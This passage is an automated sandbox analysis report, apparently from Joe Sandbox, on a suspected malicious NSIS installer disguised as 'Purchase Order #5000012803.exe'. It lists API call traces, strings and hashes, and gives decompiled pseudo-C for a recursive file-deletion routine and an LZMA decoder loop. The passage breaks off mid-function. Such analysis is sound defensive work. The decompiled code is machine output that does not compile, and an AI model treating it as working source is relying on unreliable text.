                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                      • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000), ref: 004032A6
                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000020), ref: 004032D1
                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                      • DeleteFileA.KERNELBASE(1033), ref: 00403398
                      • OleUninitialize.OLE32(00000000), ref: 00403416
                      • ExitProcess.KERNEL32 ref: 00403436
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000,00000000), ref: 00403442
                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000,00000000), ref: 0040344E
                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                      • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                      • CopyFileA.KERNEL32 ref: 004034BF
                      • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                      • ExitProcess.KERNEL32 ref: 004035A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Purchase Order #5000012803.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order #5000012803.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                      • API String ID: 2278157092-530284260
                      • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                      • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph (function 004053AA; legend: Executed / Not Executed)
                      C-Code - Quality: 94%
                      			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                      				signed int _v8;
                      				signed int _v12;
                      				struct _WIN32_FIND_DATAA _v332;
                      				signed int _t37;
                      				char* _t49;
                      				signed int _t52;
                      				signed int _t55;
                      				signed int _t61;
                      				signed int _t63;
                      				void* _t65;
                      				signed int _t68;
                      				CHAR* _t70;
                      				CHAR* _t72;
                      				char* _t75;
                      
                      				_t72 = _a4;
                      				_t37 = E00405659(__eflags, _t72);
                      				_v12 = _t37;
                      				if((_a8 & 0x00000008) != 0) {
                      					_t63 = DeleteFileA(_t72); // executed
                      					asm("sbb eax, eax");
                      					_t65 =  ~_t63 + 1;
                      					 *0x423f28 =  *0x423f28 + _t65;
                      					return _t65;
                      				}
                      				_t68 = _a8 & 0x00000001;
                      				__eflags = _t68;
                      				_v8 = _t68;
                      				if(_t68 == 0) {
                      					L5:
                      					E00405A85(0x4214a0, _t72);
                      					__eflags = _t68;
                      					if(_t68 == 0) {
                      						E004055BF(_t72);
                      					} else {
                      						lstrcatA(0x4214a0, "\*.*");
                      					}
                      					__eflags =  *_t72;
                      					if( *_t72 != 0) {
                      						L10:
                      						lstrcatA(_t72, 0x40900c);
                      						L11:
                      						_t70 =  &(_t72[lstrlenA(_t72)]);
                      						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                      						__eflags = _t37 - 0xffffffff;
                      						_a4 = _t37;
                      						if(_t37 == 0xffffffff) {
                      							L29:
                      							__eflags = _v8;
                      							if(_v8 != 0) {
                      								_t31 = _t70 - 1;
                      								 *_t31 =  *(_t70 - 1) & 0x00000000;
                      								__eflags =  *_t31;
                      							}
                      							goto L31;
                      						} else {
                      							goto L12;
                      						}
                      						do {
                      							L12:
                      							_t75 =  &(_v332.cFileName);
                      							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                      							__eflags =  *_t49;
                      							if( *_t49 != 0) {
                      								__eflags = _v332.cAlternateFileName;
                      								if(_v332.cAlternateFileName != 0) {
                      									_t75 =  &(_v332.cAlternateFileName);
                      								}
                      							}
                      							__eflags =  *_t75 - 0x2e;
                      							if( *_t75 != 0x2e) {
                      								L19:
                      								E00405A85(_t70, _t75);
                      								__eflags = _v332.dwFileAttributes & 0x00000010;
                      								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                      									E0040573D(_t72);
                      									_t52 = DeleteFileA(_t72);
                      									__eflags = _t52;
                      									if(_t52 != 0) {
                      										E00404E23(0xfffffff2, _t72);
                      									} else {
                      										__eflags = _a8 & 0x00000004;
                      										if((_a8 & 0x00000004) == 0) {
                      											 *0x423f28 =  *0x423f28 + 1;
                      										} else {
                      											E00404E23(0xfffffff1, _t72);
                      											_push(0);
                      											_push(_t72);
                      											E004057D3();
                      										}
                      									}
                      								} else {
                      									__eflags = (_a8 & 0x00000003) - 3;
                      									if(__eflags == 0) {
                      										E004053AA(_t70, __eflags, _t72, _a8);
                      									}
                      								}
                      								goto L27;
                      							}
                      							_t61 =  *((intOrPtr*)(_t75 + 1));
                      							__eflags = _t61;
                      							if(_t61 == 0) {
                      								goto L27;
                      							}
                      							__eflags = _t61 - 0x2e;
                      							if(_t61 != 0x2e) {
                      								goto L19;
                      							}
                      							__eflags =  *((char*)(_t75 + 2));
                      							if( *((char*)(_t75 + 2)) == 0) {
                      								goto L27;
                      							}
                      							goto L19;
                      							L27:
                      							_t55 = FindNextFileA(_a4,  &_v332);
                      							__eflags = _t55;
                      						} while (_t55 != 0);
                      						_t37 = FindClose(_a4);
                      						goto L29;
                      					}
                      					__eflags =  *0x4214a0 - 0x5c;
                      					if( *0x4214a0 != 0x5c) {
                      						goto L11;
                      					}
                      					goto L10;
                      				} else {
                      					__eflags = _t37;
                      					if(_t37 == 0) {
                      						L31:
                      						__eflags = _v8;
                      						if(_v8 == 0) {
                      							L39:
                      							return _t37;
                      						}
                      						__eflags = _v12;
                      						if(_v12 != 0) {
                      							_t37 = E00405D7C(_t72);
                      							__eflags = _t37;
                      							if(_t37 == 0) {
                      								goto L39;
                      							}
                      							E00405578(_t72);
                      							E0040573D(_t72);
                      							_t37 = RemoveDirectoryA(_t72);
                      							__eflags = _t37;
                      							if(_t37 != 0) {
                      								return E00404E23(0xffffffe5, _t72);
                      							}
                      							__eflags = _a8 & 0x00000004;
                      							if((_a8 & 0x00000004) == 0) {
                      								goto L33;
                      							}
                      							E00404E23(0xfffffff1, _t72);
                      							_push(0);
                      							_push(_t72);
                      							return E004057D3();
                      						}
                      						L33:
                      						 *0x423f28 =  *0x423f28 + 1;
                      						return _t37;
                      					}
                      					__eflags = _a8 & 0x00000002;
                      					if((_a8 & 0x00000002) == 0) {
                      						goto L31;
                      					}
                      					goto L5;
                      				}
                      			}

                      APIs
                      • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 004053C8
                      • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405412
                      • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405433
                      • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405439
                      • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 0040544A
                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                      • FindClose.KERNEL32(?), ref: 0040550D
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                      • "C:\Users\user\Desktop\Purchase Order #5000012803.exe" , xrefs: 004053B4
                      • \*.*, xrefs: 0040540C
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                      • API String ID: 2035342205-990634471
                      • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                      • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph (function 0040604C; legend: Executed / Not Executed)
                      C-Code - Quality: 98%
                      			E0040604C() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				void* _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t590;
                      				signed int* _t607;
                      				void* _t614;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t614 - 0x40) != 0) {
                      						 *(_t614 - 0x34) = 1;
                      						 *(_t614 - 0x84) = 7;
                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                      						L132:
                      						 *(_t614 - 0x54) = _t607;
                      						L133:
                      						_t531 =  *_t607;
                      						_t590 = _t531 & 0x0000ffff;
                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                      						if( *(_t614 - 0xc) >= _t565) {
                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                      							 *(_t614 - 0x40) = 1;
                      							_t532 = _t531 - (_t531 >> 5);
                      							 *_t607 = _t532;
                      						} else {
                      							 *(_t614 - 0x10) = _t565;
                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                      						}
                      						if( *(_t614 - 0x10) >= 0x1000000) {
                      							L139:
                      							_t533 =  *(_t614 - 0x84);
                      							L140:
                      							 *(_t614 - 0x88) = _t533;
                      							goto L1;
                      						} else {
                      							L137:
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 5;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                      							goto L139;
                      						}
                      					} else {
                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      						__esi =  *(__ebp - 0x60);
                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      						__ecx =  *(__ebp - 0x3c);
                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      						__ecx =  *(__ebp - 4);
                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      						if( *(__ebp - 0x38) >= 4) {
                      							if( *(__ebp - 0x38) >= 0xa) {
                      								_t97 = __ebp - 0x38;
                      								 *_t97 =  *(__ebp - 0x38) - 6;
                      							} else {
                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      							}
                      						} else {
                      							 *(__ebp - 0x38) = 0;
                      						}
                      						if( *(__ebp - 0x34) == __edx) {
                      							__ebx = 0;
                      							__ebx = 1;
                      							L60:
                      							__eax =  *(__ebp - 0x58);
                      							__edx = __ebx + __ebx;
                      							__ecx =  *(__ebp - 0x10);
                      							__esi = __edx + __eax;
                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								_t216 = __edx + 1; // 0x1
                      								__ebx = _t216;
                      								__cx = __ax >> 5;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								L59:
                      								if(__ebx >= 0x100) {
                      									goto L54;
                      								}
                      								goto L60;
                      							} else {
                      								L57:
                      								if( *(__ebp - 0x6c) == 0) {
                      									 *(__ebp - 0x88) = 0xf;
                      									goto L170;
                      								}
                      								__ecx =  *(__ebp - 0x70);
                      								__eax =  *(__ebp - 0xc);
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								_t202 = __ebp - 0x70;
                      								 *_t202 =  *(__ebp - 0x70) + 1;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								goto L59;
                      							}
                      						} else {
                      							__eax =  *(__ebp - 0x14);
                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      							if(__eax >=  *(__ebp - 0x74)) {
                      								__eax = __eax +  *(__ebp - 0x74);
                      							}
                      							__ecx =  *(__ebp - 8);
                      							__ebx = 0;
                      							__ebx = 1;
                      							__al =  *((intOrPtr*)(__eax + __ecx));
                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      							L40:
                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      							 *(__ebp - 0x48) = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								 *(__ebp - 0x40) = 1;
                      								__cx = __ax >> 5;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								L38:
                      								__eax =  *(__ebp - 0x40);
                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      									while(1) {
                      										if(__ebx >= 0x100) {
                      											break;
                      										}
                      										__eax =  *(__ebp - 0x58);
                      										__edx = __ebx + __ebx;
                      										__ecx =  *(__ebp - 0x10);
                      										__esi = __edx + __eax;
                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                      										__ax =  *__esi;
                      										 *(__ebp - 0x54) = __esi;
                      										__edi = __ax & 0x0000ffff;
                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      										if( *(__ebp - 0xc) >= __ecx) {
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      											__cx = __ax;
                      											_t169 = __edx + 1; // 0x1
                      											__ebx = _t169;
                      											__cx = __ax >> 5;
                      											 *__esi = __ax;
                      										} else {
                      											 *(__ebp - 0x10) = __ecx;
                      											0x800 = 0x800 - __edi;
                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      											__ebx = __ebx + __ebx;
                      											 *__esi = __cx;
                      										}
                      										 *(__ebp - 0x44) = __ebx;
                      										if( *(__ebp - 0x10) < 0x1000000) {
                      											L45:
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t155 = __ebp - 0x70;
                      											 *_t155 =  *(__ebp - 0x70) + 1;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      										}
                      									}
                      									L53:
                      									_t172 = __ebp - 0x34;
                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                      									L54:
                      									__al =  *(__ebp - 0x44);
                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      									L55:
                      									if( *(__ebp - 0x64) == 0) {
                      										 *(__ebp - 0x88) = 0x1a;
                      										goto L170;
                      									}
                      									__ecx =  *(__ebp - 0x68);
                      									__al =  *(__ebp - 0x5c);
                      									__edx =  *(__ebp - 8);
                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      									 *( *(__ebp - 0x68)) = __al;
                      									__ecx =  *(__ebp - 0x14);
                      									 *(__ecx +  *(__ebp - 8)) = __al;
                      									__eax = __ecx + 1;
                      									__edx = 0;
                      									_t191 = __eax %  *(__ebp - 0x74);
                      									__eax = __eax /  *(__ebp - 0x74);
                      									__edx = _t191;
                      									L79:
                      									 *(__ebp - 0x14) = __edx;
                      									L80:
                      									 *(__ebp - 0x88) = 2;
                      									goto L1;
                      								}
                      								if(__ebx >= 0x100) {
                      									goto L53;
                      								}
                      								goto L40;
                      							} else {
                      								L36:
                      								if( *(__ebp - 0x6c) == 0) {
                      									 *(__ebp - 0x88) = 0xd;
                      									L170:
                      									_t568 = 0x22;
                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                      									_t535 = 0;
                      									L172:
                      									return _t535;
                      								}
                      								__ecx =  *(__ebp - 0x70);
                      								__eax =  *(__ebp - 0xc);
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								_t121 = __ebp - 0x70;
                      								 *_t121 =  *(__ebp - 0x70) + 1;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								goto L38;
                      							}
                      						}
                      					}
                      					L1:
                      					_t534 =  *(_t614 - 0x88);
                      					if(_t534 > 0x1c) {
                      						L171:
                      						_t535 = _t534 | 0xffffffff;
                      						goto L172;
                      					}
                      					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      						case 0:
                      							if( *(_t614 - 0x6c) == 0) {
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							_t534 =  *( *(_t614 - 0x70));
                      							if(_t534 > 0xe1) {
                      								goto L171;
                      							}
                      							_t538 = _t534 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t570);
                      							_push(9);
                      							_pop(_t571);
                      							_t610 = _t538 / _t570;
                      							_t540 = _t538 % _t570 & 0x000000ff;
                      							asm("cdq");
                      							_t605 = _t540 % _t571 & 0x000000ff;
                      							 *(_t614 - 0x3c) = _t605;
                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                      								L10:
                      								if(_t613 == 0) {
                      									L12:
                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                      									goto L15;
                      								} else {
                      									goto L11;
                      								}
                      								do {
                      									L11:
                      									_t613 = _t613 - 1;
                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                      								} while (_t613 != 0);
                      								goto L12;
                      							}
                      							if( *(_t614 - 4) != 0) {
                      								GlobalFree( *(_t614 - 4));
                      							}
                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                      							 *(_t614 - 4) = _t534;
                      							if(_t534 == 0) {
                      								goto L171;
                      							} else {
                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                      								goto L10;
                      							}
                      						case 1:
                      							L13:
                      							__eflags =  *(_t614 - 0x6c);
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 1;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							_t45 = _t614 - 0x48;
                      							 *_t45 =  *(_t614 - 0x48) + 1;
                      							__eflags =  *_t45;
                      							L15:
                      							if( *(_t614 - 0x48) < 4) {
                      								goto L13;
                      							}
                      							_t546 =  *(_t614 - 0x40);
                      							if(_t546 ==  *(_t614 - 0x74)) {
                      								L20:
                      								 *(_t614 - 0x48) = 5;
                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                      								goto L23;
                      							}
                      							 *(_t614 - 0x74) = _t546;
                      							if( *(_t614 - 8) != 0) {
                      								GlobalFree( *(_t614 - 8));
                      							}
                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                      							 *(_t614 - 8) = _t534;
                      							if(_t534 == 0) {
                      								goto L171;
                      							} else {
                      								goto L20;
                      							}
                      						case 2:
                      							L24:
                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                      							 *(_t614 - 0x84) = 6;
                      							 *(_t614 - 0x4c) = _t553;
                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                      							goto L132;
                      						case 3:
                      							L21:
                      							__eflags =  *(_t614 - 0x6c);
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 3;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							_t67 = _t614 - 0x70;
                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                      							__eflags =  *_t67;
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                      							L23:
                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                      							if( *(_t614 - 0x48) != 0) {
                      								goto L21;
                      							}
                      							goto L24;
                      						case 4:
                      							goto L133;
                      						case 5:
                      							goto L137;
                      						case 6:
                      							goto L0;
                      						case 7:
                      							__eflags =  *(__ebp - 0x40) - 1;
                      							if( *(__ebp - 0x40) != 1) {
                      								__eax =  *(__ebp - 0x24);
                      								 *(__ebp - 0x80) = 0x16;
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x28);
                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      								__eax =  *(__ebp - 0x2c);
                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      								__eax = 0;
                      								__eflags =  *(__ebp - 0x38) - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
